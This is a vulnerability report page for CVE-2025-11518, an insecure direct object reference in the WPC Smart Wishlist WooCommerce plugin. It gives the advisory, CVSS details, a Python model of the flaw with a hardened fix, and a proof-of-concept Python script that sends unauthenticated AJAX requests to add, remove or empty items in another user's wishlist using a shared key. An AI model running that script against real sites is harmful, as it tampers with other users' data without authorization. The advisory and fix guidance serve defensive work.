Security Vulnerability Report

CVE-2025-11518

Published: 2025-10-11 09:15:33
Last Modified: 2026-04-15 00:35:42

Description

The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.0.3 via several wishlist AJAX functions due to missing validation on a user-controlled key that is exposed when wishlists are shared. This makes it possible for unauthenticated attackers to empty and add to other users' wishlists, if they have access to the key. Possession of the shared key is the only precondition: the AJAX endpoints are reachable without a session, which is why the vector carries PR:N, and the effect is limited to modifying wishlist contents (I:L, no confidentiality or availability impact).
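The pattern the advisory describes (CWE-639) is a share key that is also accepted as write authorization. The following is an added example, not the plugin's code: a minimal in-memory wishlist store, a handler that trusts the client-supplied key the way the advisory describes, and a hardened handler that resolves the wishlist from the authenticated identity and treats the key as read-only. The store, the request shape and the handler names are assumptions made for illustration.

```python
"""Model of CWE-639 in a wishlist AJAX handler, with a hardened version.

Added example, not the plugin's code: the store, request shape and handler
names are assumptions chosen to mirror the behaviour in the advisory
(a share key that doubles as write authorization).
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Wishlist:
    owner_id: int
    share_key: str                      # exposed in "share this wishlist" URLs
    products: set = field(default_factory=set)


class WishlistStore:
    """In-memory stand-in for the plugin's wishlist table (assumption)."""

    def __init__(self):
        self.by_key = {}
        self.by_owner = {}

    def create(self, owner_id):
        wl = Wishlist(owner_id, secrets.token_urlsafe(16))
        self.by_key[wl.share_key] = wl
        self.by_owner[owner_id] = wl
        return wl


def vulnerable_add(store, request):
    """Vulnerable pattern: the client-supplied key selects the wishlist and
    nothing checks that the caller owns it. Anyone holding a shared key can
    write, which is the IDOR the advisory describes."""
    wl = store.by_key.get(request.get("wishlist_key", ""))
    if wl is None:
        return {"success": False, "error": "unknown wishlist"}
    wl.products.add(int(request["product_id"]))
    return {"success": True, "owner": wl.owner_id}


def hardened_add(store, request, current_user_id):
    """Hardened pattern: mutating actions resolve the wishlist from the
    authenticated identity and ignore any key in the request. The key stays
    a read-only share token (see view_shared)."""
    if current_user_id is None:
        return {"success": False, "error": "login required"}
    wl = store.by_owner.get(current_user_id) or store.create(current_user_id)
    wl.products.add(int(request["product_id"]))
    return {"success": True, "owner": wl.owner_id}


def view_shared(store, share_key):
    """Read-only access is the only capability a share key should grant."""
    wl = store.by_key.get(share_key)
    return None if wl is None else sorted(wl.products)


def demo():
    """Replays the attack against both handlers and returns the outcomes."""
    store = WishlistStore()
    victim = store.create(owner_id=7)
    victim.products.add(100)

    # Attacker holds no session but learned the key from a shared URL
    # (constructed scenario).
    attacker_req = {"wishlist_key": victim.share_key, "product_id": "123"}

    vuln = vulnerable_add(store, attacker_req)
    hard_anon = hardened_add(store, attacker_req, current_user_id=None)
    hard_authed = hardened_add(store, attacker_req, current_user_id=42)

    return {
        "vulnerable": vuln,                       # writes into the victim's list
        "hardened_anonymous": hard_anon,          # rejected: no identity
        "hardened_as_user_42": hard_authed,       # lands in the caller's own list
        "victim_products": sorted(victim.products),
        "attacker_products": view_shared(store, store.by_owner[42].share_key),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The design point is that a share key is a capability for reading, so it must never be the input that selects the object for a write. In a WordPress plugin the equivalent is resolving the wishlist from get_current_user_id() inside the wp_ajax_ handler and not exposing the mutating actions via wp_ajax_nopriv_; if guest wishlists must be writable, bind them to a separate server-side secret in the visitor's session rather than to the key that appears in share URLs.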

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

No CPE configuration data is published for this entry; the affected range below is taken from the advisory text.

WPC Smart Wishlist for WooCommerce <= 5.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The AJAX action and parameter names it uses are the PoC's own; the NVD entry says only "several wishlist AJAX functions", so confirm them against the plugin version under test before relying on the script.
```python
# CVE-2025-11518 PoC - WPC Smart Wishlist IDOR Exploit
# Exploits missing authorization validation on wishlist key in AJAX endpoints
import requests

TARGET_URL = "https://target-wordpress-site.com"

# The wishlist key can be obtained from shared wishlist URLs or other sources
WISHLIST_KEY = "stunning-strong-key-here"  # Target user's wishlist key

# WordPress AJAX endpoint
ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"


# Step 1: Add an item to victim's wishlist via IDOR
def add_item_to_wishlist(product_id):
    """Exploit IDOR to add a product to another user's wishlist without authentication."""
    payload = {
        "action": "wpcsw_add_to_wishlist",
        "product_id": str(product_id),
        "wishlist_key": WISHLIST_KEY,  # User-controlled key without ownership validation
    }
    response = requests.post(ajax_url, data=payload, timeout=15)
    print(f"[*] Add item response: {response.status_code}")
    print(f"[*] Response body: {response.text}")
    return response


# Step 2: Empty victim's wishlist via IDOR
def empty_wishlist():
    """Exploit IDOR to empty another user's wishlist without authentication."""
    payload = {
        "action": "wpcsw_remove_all_from_wishlist",
        "wishlist_key": WISHLIST_KEY,  # User-controlled key without ownership validation
    }
    response = requests.post(ajax_url, data=payload, timeout=15)
    print(f"[*] Empty wishlist response: {response.status_code}")
    print(f"[*] Response body: {response.text}")
    return response


# Step 3: Remove specific item from victim's wishlist
def remove_item_from_wishlist(product_id):
    """Exploit IDOR to remove a specific product from another user's wishlist."""
    payload = {
        "action": "wpcsw_remove_from_wishlist",
        "product_id": str(product_id),
        "wishlist_key": WISHLIST_KEY,
    }
    response = requests.post(ajax_url, data=payload, timeout=15)
    print(f"[*] Remove item response: {response.status_code}")
    print(f"[*] Response body: {response.text}")
    return response


if __name__ == "__main__":
    print("[*] CVE-2025-11518 - WPC Smart Wishlist IDOR Exploit")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Wishlist Key: {WISHLIST_KEY}")
    print("-" * 50)

    # Example: Add product ID 123 to victim's wishlist
    add_item_to_wishlist(123)

    # Example: Empty victim's entire wishlist
    # empty_wishlist()

    # Example: Remove product ID 456 from victim's wishlist
    # remove_item_from_wishlist(456)
```

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3375421%40woo-smart-wishlist&new=3375421%40woo-smart-wishlist&sfp_email=&sfph_mail= (plugin changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/afe275b4-edc0-4b19-a91f-5099a085e8ce?source=cve (Wordfence threat intel entry)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11518",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-11T09:15:32.653",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.0.3 via several wishlist AJAX functions due to missing validation on a user controlled key that is exposed when wishlists are shared. This makes it possible for unauthenticated attackers to empty and add to other user's wishlists, if they have access to the key."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3375421%40woo-smart-wishlist&new=3375421%40woo-smart-wishlist&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/afe275b4-edc0-4b19-a91f-5099a085e8ce?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```